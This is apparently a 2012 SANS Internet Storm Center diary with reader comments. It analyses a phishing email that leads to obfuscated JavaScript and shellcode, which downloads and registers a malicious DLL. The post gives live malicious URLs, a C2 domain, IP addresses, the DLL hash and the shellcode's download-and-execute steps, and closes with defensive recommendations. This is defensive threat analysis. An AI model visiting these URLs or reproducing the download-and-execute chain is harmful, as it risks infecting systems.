Phishing with obfuscated javascript, shellcode and malware

Published: 2012-03-02
Last Updated: 2012-03-03 05:02:38 UTC
by Manuel Humberto Santander Pelaez (Version: 1)
8 comment(s)

Be careful with the links showed in this diary because they are live and could infect your computer if not handled properly

Phishing e-mail artwork is becoming more effective everyday. Users are having a bad time trying to distinguish the fake sites from the real ones. I am going to show you a different phising e-mail that does not take the user to a website to try to steal a password but installs malware to the computer using obfuscated javascripts and shellcodes.

I received today the following message:

Intuit SPAM

This looked strange. I reviewed the link and pointed me to http://thedizzybaker.com/wp-includes/int-market.html. The following javascript appeared:

First Javascript

This javascript is obfuscated. I used firebug to get more information and got an iframe pointing to other website:

Iframe within malicious javascript

Following the new link, we find another obfuscated javascript. Let's see a snip of it:

Javascript snip

Now here is where the malicious stuff begins. After deobfuscating the script, we find the following:

  •  The script tries to determine which navigator is running the system:

Navigator Detection

  •   The script tries to determine the Adobe Flash and Adobe Reader version installed:

Flash Version

Adobe Reader Version

  •  A shellcode is executed:

Shellcode executed

Let's take a look to the shellcode. It executes the following instructions:

  1. kernel32.VirtualProtect: This function is called in the shellcode to establish a 255-byte memory segment where the memory protection attributes can be modified. For more information about the available attributes, see http://msdn.microsoft.com/en-us/library/windows/desktop/aa366786%28v=vs.85%29.aspx.
  2. kernel32. LoadLibraryA: This function is called to load the urlmon.dll library, which is used to transfer information using the http protocol. A couple of functions inside the file are:URLMON Functions
  3. urlmon.URLDownloadToFileA: The function is called to download http://migdaliasbistro.net/w.php?f=f7d19&e=1 and save it to wpbt0.dll.
  4. kernel32.WinExec: This function is called to register the dll using regsvr32 -s and then executed.
  5. kernel32.TerminateThread: This function is called to end the execution of the shellcode.

The file download in step 3 is a dll with MD5 c3124a2981d8e1b9e13e8c21c96448f7. Virustotal shows a 7/43 detection ratio.  It injects into explorer.exe and performs inline hooking to ntdll.dll. Once it is installed, it reports to hbirjhcnsuiwgtrq.ru, which resolvs to the following ip addresses: 94.20.30.91, 98.103.133.13, 173.203.211.157, 211.44.250.173, 46.137.85.218, 83.170.91.152, 87.120.41.155 using a http POST to the /rwx/B2_9w3/in/ location.

Such threats are increasing and control of these involves the establishment of malware control measures as part of te Information Security Architecture of the company, like the following:

  • Antimalware perimeter defense: I recommend using the Trend Micro and Mcafee web gateways. They are scalabe and integrates very good with the antimalware monitoring system inside the corporation. This measure allows to protect users from downloading malicious code like javascript and executables.
  • Host IPS: The antimalware control is not enough in these days as the threats are evolving and the antivirus companies are not capable anymore to control in real time all the emerging malware attacks. This tool is used to prevent the materialization of the vulnerabilities on computers, such as buffer overflow, code injection, among others. Thus, the computer is protected until the virus signature is out so the antimalware program is able to deal with the respective threat.
  • Antimalware: This is the conventional antimalware control that is sold by the antivirus companies.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

Keywords:
8 comment(s)

Comments

Hi Manuel,

this is a great post. can you help to explain more how you decode the obfuscated code and with firebug and eventually found the shellcode? I wanted to replicate your findings to educational purposes
Why use active links in this diary? Why not add some spaces, etc. to protect the unwary visitor? I am sure a small percentage of your readers are unskilled, perhaps hitting SANS for the first time. Why endanger them?
Good morning Manuel,

First I want to say thank you for posting this Phishing campaign. Secondly I wanted to request if you can update this post with the original sender (email), subject of the email and if possible the Internet headers?

The reason for this request is because this will facilitate in the creation of rules in which we can redirect email before end users receive them and also identify if anyone already got them but either deleted it or have yet to click on the link within the body of the email.

Thanks
Out of curiosity, what is the source of the graphics of this and other spam emails you receive? Are they embedded in the email itself, linked to the legitimate company's site or hosted on a 3rd party site?

From the copy I received:

From: noreply@careerbuilder.com
Subject: Your Intuit.com order confirmation.
IMG SRC="http://about.intuit.com/sbweb/common/images/header/logo_bar/intuit_logo.gif"
A HREF="hxxp://premiumsoft.com.ar/foobar/index.html"
(Note: http changed to hxxp to protect the foolish, what appears to be a 8-character token replaced by 'foobar' to protect me :) )

Headers: (Again, with a whole bunch of potentially identifying info redacted)
Delivered-To: me@recipient.com
Received: by 10.204.57.194 with SMTP id xxx;
Thu, 1 Mar 2012 xx:xx:xx -0800 (PST)
Received: by 10.180.90.225 with SMTP id xxx;
Thu, 01 Mar 2012 xx:xx:xx -0800 (PST)
Return-Path: <noreply@careerbuilder.com>
Received: from 123-162-192-190.cab.prima.net.ar ([190.192.162.123])
by mx.google.com with ESMTP id xxx;
Thu, 01 Mar 2012 xx:xx:xx -0800 (PST)
Received-SPF: fail (google.com: domain of noreply@careerbuilder.com does not designate 190.192.162.123 as permitted sender) client-ip=190.192.162.123;
Authentication-Results: mx.google.com; spf=hardfail (google.com: domain of noreply@careerbuilder.com does not designate 190.192.162.123 as permitted sender) smtp.mail=noreply@careerbuilder.com
Received: from apache by careerbuilder.com with local (Exim 4.63)
(envelope-from <noreply@careerbuilder.com>)
id xxx
for <me@recipient.com>; Thu, 1 Mar 2012 xx:xx:xx -0300
To: <me@recipient.com>
Subject: Your Intuit.com order confirmation.
Date: Thu, 1 Mar 2012 xx:xx:xx -0300
From: "INTUIT INC." <noreply@careerbuilder.com>
Message-ID: <xxx@careerbuilder.com>
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="------------xxx"

This is a multi-part message in MIME format.
--------------xxx
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="iso-8859-2"
Just thought I'd add that this is a Blackhole exploit kit and this sort of e-mail campaign is very much in use at the moment (I've also seen similar ACH and AICP ones recently).
I'm no expert. I played with having a mail server for a bit. But a few weeks ago, LogWatch reported 1000s of connections to port 25 from an IP that resolved to careerbuilder.com. I just shut the server down. Is careerbuilder.com compromised?
regarding the linking of the logo...
This confirms my theory. I find that most of these phishing scams are cross-linking the legitimate images from the original site in their attack.

Would others concur that this is the typical methodology you see?

I would think these high-value target sites would be able to detect these and serve warning graphics instead of the legitimate logos.

Diary Archives